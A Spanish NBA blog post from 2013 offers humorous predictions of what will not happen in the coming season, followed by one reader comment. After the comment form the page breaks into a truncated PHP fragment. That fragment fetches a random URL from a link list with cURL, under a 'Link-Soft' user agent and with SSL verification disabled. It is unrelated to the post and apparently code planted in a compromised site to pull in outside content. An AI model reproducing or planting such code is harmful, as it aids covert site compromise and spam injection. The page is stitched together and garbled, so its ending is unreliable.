Reflexiones sobre la bocina #15: Especial pronósticos

15 de October de 2013 por MagicJohnson32
crystal ball

– “¿Cóoomooo? ¿Que Ben Gordon cobrará más de 13 millones esta temporada?”

Octubre, tiempo de pronósticos.

Cuatro meses han transcurrido desde que concluyesen las Finales 2013 de la NBA y nuestro calendario se arrastra, penosamente lento, hacia el season opener del nuevo curso. Quedan apenas un par de semanas para que Nikola Vucevic y Roy Hibbert disputen el primer salto entre dos de la campaña y, puesto que no tenemos remedio, buscamos válvulas de escape a nuestras incontenibles ansias de NBA. Devoramos las summer leagues y los partidos de exhibición; nos inscribimos a tantas ligas fantasy que nuestra vida social se resiente de manera casi irreparable durante los días -semanas- que duran los drafts; nos abalanzamos sobre la nueva edición del NBA2K al minuto de su salida al mercado; y, por encima de todo, nos atrevemos a profetizar el devenir de esta temporada en ciernes. A esto último nos dedicaremos en esta entrega de las Reflexiones sobre la bocina: especial pronósticos.

La tendencia general en estos casos es pronosticar sobre las cosas que pasarán: quién será el campeón, qué jugadores se alzarán con los premios individuales, quién será el máximo anotador, el CoY, etc. Pero para esto ya tenemos nuestra porra anual (que por cierto, volverá pronto). Las Reflexiones poseen una tendencia innata a remar a contracorriente, así que a continuación trataremos de anticipar algunas de las cosas que NO sucederán a lo largo de la temporada 2013-2014 de la NBA:

    • Los Miami Heat NO lograrán el three-peat. Esto, por supuesto, desafía todo dictado del sentido común. Así nos lo refrendan las casas de apuestas deportivas que, si por algo se caracterizan, es por apostar a caballo ganador. A un par de semanas todavía del arranque de la competición oficial, pesa infinitamente más el segundo anillo consecutivo ganado por las huestes de Pat Riley que cualquier otra consideración. ¿Por qué no íbamos a apostar por el vigente campeón, poseedor de la mejor plantilla, con el mejor jugador y el mejor GM de la liga? La obviedad no es tanta si revisamos la historia reciente, las angustias de los Heat para superar primero a Pacers y después a Spurs, unos apuros que tuvieron su epítome en aquel tiro libre errado por Kawhi Leonard mientras los operarios del American Airlines Arena preparaban la ceremonia para coronar a los Spurs. No se trata de restar méritos a los Heat, que no tienen nada ya por demostrar después de convertirse en uno de los pocos equipos de la historia en repetir título. Se trata de reconocer que las circunstancias se aliaron a su favor, caso de las lesiones de Rose, Westbrook o Rondo, entre otras, o caso de aquel aún hoy inexplicable movimiento táctico de Frank Voguel al final del primer partido de las finales de Conferencia; entender que no es probable que suceda de nuevo y que la nueva temporada es, por fortuna, una pizarra en blanco.
    • Andrew Bynum NO será ovacionado por el público de los Sixers. Es una intuición que tengo, tampoco me hagáis mucho caso. Eso, claro está, en el caso de que el pívot se digne a debutar con los Cavs, algo por lo que yo tampoco me jugaría los ahorros.
    • Josh Smith NO alcanzará el 45% de acierto en tiros de campo, ni el 30% en triples, ni el 50% en libres. Militar en un equipo que cuente con Monroe y Drummond es la excusa que necesitaba Smith para lanzar más triples, lo que incidirá inevitablemente en la caída que vienen sufriendo sus porcentajes. La llegada del ex de los Hawks y el seguro incremento en la cifra de lanzamientos de Drummond tampoco ayudarán a evitar que los Pistons sean el peor equipo en tiros libres de la liga. De largo.

      howard

      Howard On Fire!!

    • Los Lakers NO retirarán la camiseta de Dwight Howard. Tal vez la quemen o celebren rituales de vudú con ella, pero bajo ningún concepto la retirarán. Y creo que podemos descartar que la franquicia angelina dedique una estatua de bronce al nuevo pívot de los Rockets.
    • Derrick Rose NO jugará los 82 partidos. El retorno de D-Rose es un inmenso ‘hype waiting to happen’, y hará falta poco más que una actuación notable del de Chicago el día 29 contra los Heat para que prensa y aficionados perdamos la cabeza con él, le metamos en nuestras quinielas para el MVP y le elevemos a principal aspirante al trono de LeBron. Pero después de casi un año y medio sin disputar un partido oficial, hay que asumir que su regreso a una competición con un grado de exigencia física tan brutal como la NBA no le resultará un camino de rosas. Mi pronóstico, por tanto, es que Rose no jugará todos los partidos de la temporada, pero sí más que Amare, Bynum, Greg Oden y Eric Gordon. Juntos.
    • Melo y Bargnani NO se darán una sola asistencia el uno al otro en toda la temporada. Aquí lo verdaderamente audaz habría sido pronosticar lo opuesto, así que pasemos de largo.
    • Jason Kidd NO estrangulará a Kevin Garnett. Y no será por falta de ganas, pero al técnico novato le tocará lidiar con KG y compañía si espera conducir el mega proyecto de los Nets a buen puerto. Uno de los grandes alicientes de la temporada será comprobar si Kidd traslada al banquillo su demostrada capacidad de liderazgo sobre el parquet, en especial cuando tendrá entre manos a la plantilla más cara de la liga, repleta de algunos de los que fueron sus grandes rivales en las canchas.
    • Blog.tjnba.com NO copiará los titulares del Marca. Garantizado.
Comenta

Un comentario a esta entrada

  1. Denise dice:
    #1

    jaja, yo creo que va a ser Garnett el que va a estrangular a Kidd.
    Por otra parte, no veo tan claro el threepeat para los Heat. Cada año les cuesta mas y el nivel de Lebron del año pasado es practicamente insuperable.
    Y muchos palos le caen a Bargnani, pero creo que el italiano lo va a hacer bastante bien si las lesiones le respetan.
    En lo de Smith te equivocaras y los Pistons van a ser el equipo revelación de la liga.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>